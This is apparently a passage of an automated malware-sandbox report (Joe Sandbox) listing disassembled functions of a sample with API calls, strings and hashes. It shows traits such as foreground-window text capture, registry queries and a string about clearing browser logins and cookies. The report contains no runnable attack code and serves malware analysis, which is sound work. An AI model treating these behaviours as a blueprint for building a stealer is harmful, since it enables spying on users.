Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788

Function 024B1CE8 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
Instruction ID: efe278334b06abfeb5f59f028cfe89baa131f02c658732360ce8a26963ea473b
Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
Instruction Fuzzy Hash: F4410B71600714AFD7269F78C854BEABBFEEF88710F10856FE549DB280D771A5418BA0

Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: 565c57111dca98f86a2b789264d15b9ef7105e49ec95889a230e0b36b069942f
Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
Opcode Fuzzy Hash: 565c57111dca98f86a2b789264d15b9ef7105e49ec95889a230e0b36b069942f
Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A

Function 024748EF Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 024749DF
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 024749F3
WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 024749FE
CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 02474A07

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Create$CloseEventHandleObjectSingleThreadWait
String ID:
API String ID: 3360349984-0
Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
Instruction ID: 101969214caacf2e7daf7b56fac6c2e395d5c0201c81b5dd0cfa0e4a4de56068
Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
Instruction Fuzzy Hash: E0416471204342AFC715EB62DC54DFFB7EAEF95710F00096EF9A692290DB60D9098A51

Function 024C013A Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000006,?,00000000,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?), ref: 024C0187
MultiByteToWideChar.KERNEL32(?,00000001,00000006,?,00000000,?,?,?,?,00000001,?,00000006,00000001,?,?,?), ref: 024C0210
GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,00000006,00000001,?,?,?,00000002,?), ref: 024C0222
__freea.LIBCMT ref: 024C022B

Part of subcall function 024B6D66: RtlAllocateHeap.NTDLL(00000000,024A468A,?), ref: 024B6D98

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
Instruction ID: 1e094010ae4cd4fc7684563ba31d6c7452982adbca774612511f8cd84ed52a89
Opcode Fuzzy Hash: d6883ffe4d8719f2de826ec879274d1cc3acae2ccbd5fd9a5eba82e14a7f8a2b
Instruction Fuzzy Hash: 6331A072A0021A9BDB258F69DC44EBF7BAAEF44714F15416EFC04DA250EB35CD51CB90

Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040B81B
Sleep.KERNEL32(00001388), ref: 0040B8A3

Strings

[Cleared browsers logins and cookies.], xrefs: 0040B8DE
Cleared browsers logins and cookies., xrefs: 0040B8EF

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: 40093e3523572e5a43f992c0ee2900dd8537eb165b3b41110f4c7e9bb81389bb
Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
Opcode Fuzzy Hash: 40093e3523572e5a43f992c0ee2900dd8537eb165b3b41110f4c7e9bb81389bb
Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF

Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D

Sleep.KERNEL32(00000BB8), ref: 004115C3

Strings

exepath, xrefs: 0041154C, 0041158C, 0041160D
@CG, xrefs: 00411547
BG, xrefs: 00411539

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @CG$exepath$BG
API String ID: 4119054056-3221201242
Opcode ID: 7c6b813e4766c68c7f15e9ce2ddff050a0d7a175943bea6dec11d514be905cae
Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
Opcode Fuzzy Hash: 7c6b813e4766c68c7f15e9ce2ddff050a0d7a175943bea6dec11d514be905cae
Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD

Function 0248178B Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 024828C4: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 024828E0
Part of subcall function 024828C4: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 024828F9
Part of subcall function 024828C4: RegCloseKey.ADVAPI32(?), ref: 02482904

Sleep.KERNEL32(00000BB8), ref: 0248182A

Strings

exepath, xrefs: 024817B3, 024817F3, 02481874
BG, xrefs: 024817A0
@CG, xrefs: 024817AE

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseOpenQuerySleepValue
String ID: @CG$exepath$BG
API String ID: 4119054056-3221201242
Opcode ID: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
Instruction ID: 75e3edcdc1f5b8d695ba8a6807ae8379f2081ad0bb5bc0e67ff5786b022533dd
Opcode Fuzzy Hash: 820c01e33afeab3fc0483e6c9ee435281bf1bbf0289cdfb463ea79f6631d800d
Instruction Fuzzy Hash: 5821F891B0034417DB24F73A1C15AFF724F8BC1354F00457FAD2E97286EFA999068AB5

Function 024750B5 Relevance: 6.1, APIs: 4, Instructions: 79windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 024750D8
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02475188
TranslateMessage.USER32(?), ref: 02475197
DispatchMessageA.USER32(?), ref: 024751A2
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 0247525A
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02475292

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID:
API String ID: 2956720200-0
Opcode ID: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
Instruction ID: cb847aa8a6a6c28f4befdbf1779b7e15818884bff4daf5e3413f6c744ad50a90
Opcode Fuzzy Hash: 822d3e8355dfe554be3e3a6cb7f23e7c77d447b8df2c12cbc1a70b6fed0e93d0
Instruction Fuzzy Hash: 852160719043016BCA14FB75DD498EF7BA9AB85711F800A2EFD2686194EF35D608CE52

Function 0041A98A Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0041A9A0
Sleep.KERNEL32(000003E8), ref: 0041A9AB
GetSystemTimes.KERNEL32(?,?,?), ref: 0041A9C0
__aulldiv.LIBCMT ref: 0041AA5C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63

Function 0248ABF1 Relevance: 6.1, APIs: 4, Instructions: 78timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0248AC07
Sleep.KERNEL32(000003E8), ref: 0248AC12
GetSystemTimes.KERNEL32(?,?,?), ref: 0248AC27
__aulldiv.LIBCMT ref: 0248ACC3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction ID: faa548689d5c0d56afcedd7069e27bfeef04a479a81d9823d77c9797da460be3
Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
Instruction Fuzzy Hash: 572141725183159FC304EF69D88489FB7E9EFC8754F044A2EF68593250EA34EA099B63

Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041B6E6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B6F6
Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B729

Sleep.KERNEL32(000001F4), ref: 00409C95
Sleep.KERNEL32(00000064), ref: 00409D1F

Strings

], xrefs: 00409C9D
[ , xrefs: 00409CB1

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: fd0bdcf5dab8d8c366e580a5407df2d8c150ae008c8ba1ad0acc66edb95026ef
Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
Opcode Fuzzy Hash: fd0bdcf5dab8d8c366e580a5407df2d8c150ae008c8ba1ad0acc66edb95026ef
Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF

Function 0248A053 Relevance: 6.1, APIs: 4, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0248A063
OpenServiceW.ADVAPI32(00000000,00000000,00000002), ref: 0248A077
CloseServiceHandle.ADVAPI32(00000000), ref: 0248A084
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0248A0B9

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Service$Open$ChangeCloseConfigHandleManager
String ID:
API String ID: 110783151-0
Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
Instruction ID: c6795b70ab1b60225c8912c6fd469be595b49443c9d36562671e3e65087ef0e5
Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
Instruction Fuzzy Hash: 6601D6311542247AD6216F24AC49F7F3AACDB47670F000227F622922D1DAD0D9418961

Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE

Function 0248B7F6 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0248B90C,00000000,00000000,?), ref: 0248B835
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B852
WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B866
CloseHandle.KERNEL32(00000000,?,00000000,0248B90C,00000000,00000000,?,?,0247A270), ref: 0248B873

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction ID: ece7b283cd7e8e5044c076987ba05415274832188b317b67253953a6dd05b167
Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
Instruction Fuzzy Hash: D901F171229214BFE6146E29AC89F7F779CEB8627DF00463AFA62C22D1D721CC058674

Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C

Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068

Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043810F

Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6

_UnwindNestedFrames.LIBCMT ref: 00438124
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
CallCatchBlock.LIBVCRUNTIME ref: 0043815D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8

Function 00447210 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue), ref: 00447242
GetLastError.KERNEL32(?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446F91), ref: 0044724E
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471B7,?,00000000,00000000,00000000,?,004474E3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044725C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction ID: 998cab178f840ac2caaf283a3a5c141d85ba25b8fcaedc139a46ff50caeaa73b
Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction Fuzzy Hash: FC01D83261D7236BD7214B79AC44A577798BB05BA1B1106B2F906E3241D768D802C6D8

Function 024B7477 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,024B741E,?,00000000,00000000,00000000,?,024B774A,00000006,0045D330), ref: 024B74A9
GetLastError.KERNEL32(?,024B741E,?,00000000,00000000,00000000,?,024B774A,00000006,0045D330,0045D328,0045D330,00000000,00000364,?,024B71F8), ref: 024B74B5
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024B741E,?,00000000,00000000,00000000,?,024B774A,00000006,0045D330,0045D328,0045D330,00000000), ref: 024B74C3

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction ID: 64151885f70147383cf1393bc9e902af69b2f02c5d8e3b8b6a1650a9364ad69f
Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
Instruction Fuzzy Hash: 5E018833A153266FC7324A79AC44A97BF98AF85A63B114A71F906D7281D720D841CAF4

Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633
GetFileSize.KERNEL32(00000000,00000000,00000000), ref: 0041B647
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041B66C
CloseHandle.KERNEL32(00000000,00000000,00401913), ref: 0041B67A

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 0081fdefcbe3eab55ee8814d2dd32ea432dfe817bd9b1dad6a3baca6f8509ccf
Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
Opcode Fuzzy Hash: 0081fdefcbe3eab55ee8814d2dd32ea432dfe817bd9b1dad6a3baca6f8509ccf
Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179

Function 0248B881 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A
GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B8AE
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B8D3
CloseHandle.KERNEL32(00000000,?,00000000,02473D5A,00465324), ref: 0248B8E1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
Instruction ID: 216f59d39d279e5d609f0338fc99a78121303eb3c43832616cf28b930cb575da
Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
Instruction Fuzzy Hash: 59F0F6B52063087FE2102B21FC84FBF375CEB866A9F00023EFD12E2281CA618C459571

Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 00418519
GetSystemMetrics.USER32(0000004D), ref: 0041851F
GetSystemMetrics.USER32(0000004E), ref: 00418525
GetSystemMetrics.USER32(0000004F), ref: 0041852B

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

